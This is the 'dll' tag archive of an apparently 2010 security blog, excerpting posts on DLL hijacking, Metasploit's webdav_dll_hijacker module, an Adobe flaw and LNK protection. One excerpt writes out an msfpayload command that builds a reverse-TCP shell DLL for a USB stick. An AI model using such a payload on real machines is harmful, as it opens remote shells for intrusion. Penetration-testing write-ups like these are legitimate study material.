Dll | Attack Vector

Posts Tagged ‘dll’

Really, Adobe?

Posted: 20th September 2010 by Matt in code, hacks, news, security
Tags: 0day, Acrobat, Adobe, cooltype, corporate, dll, exploitation, information, own, PDF, penetration, SING, software, strncat, SumatraPDF, vulnerability, Xpdf

So, I’ve come across a lot more information regarding the no-longer-0day Adobe vulnerability (oh, wait, that’s right.. there have been like, 12 in the last 30 days.. I’m referring just to the SING table one). Anyway, a penetration testing company named Ramz Afzar has released an unofficial patch to fix the Adobe vulnerability, because apparently [...]

Autorun DLL Hijacker (USB stick)

Posted: 26th August 2010 by Matt in code, hacks, security
Tags: 0day, autorun, dll, exploit, hack, hijacker, Hijacking, network security audit, USB, vulnerability

I decided that it might be useful to be able to utilize DLL hijacking with Autorun.. here’s the outcome. # msfpayload windows/shell/reverse_tcp LHOST=192.168.0.58 D > /media/KINGSTON/wab32res.dll Created by msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: LHOST=192.168.0.58

Video Demo of DLL Hijacking Attack.

Posted: 26th August 2010 by Matt in hacks, security
Tags: 0day, address book, dll, exploit, hack, hijack, Microsoft, vulnerability, webdav_dll_hijacker

This is a quick video demonstrating the “webdav_dll_hijacker” Metasploit module. In this video, I target Windows Address Book (.vcf/wab32res.dll) (Best viewed in fullscreen mode in 480p or higher. Youtube absolutely killed the video quality. Thanks Youtube!) Just to make sure this is clear.. the window on the left side of the screen is my Linux [...]

Alternative DLL Hijacking Method

Posted: 25th August 2010 by Matt in code, hacks, security
Tags: Administrator, attack, dll, hijack, Hijacking, metasploit, Meterpreter, msf, msfconsole, msfpayload, vulnerability, webdav, webdav_dll_hijacker

UPDATE: One thing that I didn’t mention in this post is that these files do NOT have to be saved to a share. So long as the file and the DLL reside in the same directory (think USB stick), the exploitation will succeed. /UPDATE So, yesterday I wrote a post detailing the exploitation of this [...]

DLLHijackAuditKit v2

Posted: 25th August 2010 by Matt in hacks, news, security
Tags: 0day, automated, dll, DLLHiJackAuditKit, exploit, hack, hd moore, hijack, metasploit, own, vulnerable, webdav, Windows

HD Moore (Metasploit) has just released an update to his original DLLHiJackAuditKit which further automates the process of discovering programs which are vulnerable to this attack. You can find his post here And here is the direct link to the zip file.

New DLL Hijacking Exploits (many!)

Posted: 24th August 2010 by Matt in code, hacks, news, security
Tags: Administrator, attack, demo, demonstration, dll, example, examples, exploit, hijack, metasploit, Meterpreter, msf, msfconsole, network security audit, payload, tutorial, vulnerability, webdav_dll_hijacker, Windows, windows/browser/webdav_dll_hijacker

So, for those of you who do not follow the Metasploit project as closely as others, there was a new module included in the 10125 revision which came out on Monday. This module is kind of a huge deal, because it affects many, many Windows programs. I’ll demonstrate one in this post, but if you [...]

File Server LNK Protection

Posted: 22nd July 2010 by Matt in hacks, news, security
Tags: bat, block, dll, exe, file, file screening, file server, Linux, LNK, NAS, protect, Protection, Samba, screen, share, spread, Stuxnet, Veto, vulnerability, Windows

I figured I’d throw this out there.. I wanted to make sure that in the event that somehow my network were infected by something that used this vulnerability that it would be limited to an individual machine. Basically, I didn’t want it on my file server. Also, at the bottom of this post I give [...]

Sponsored Links

Archives

Recent Posts

Blogroll

matt@attackvector.org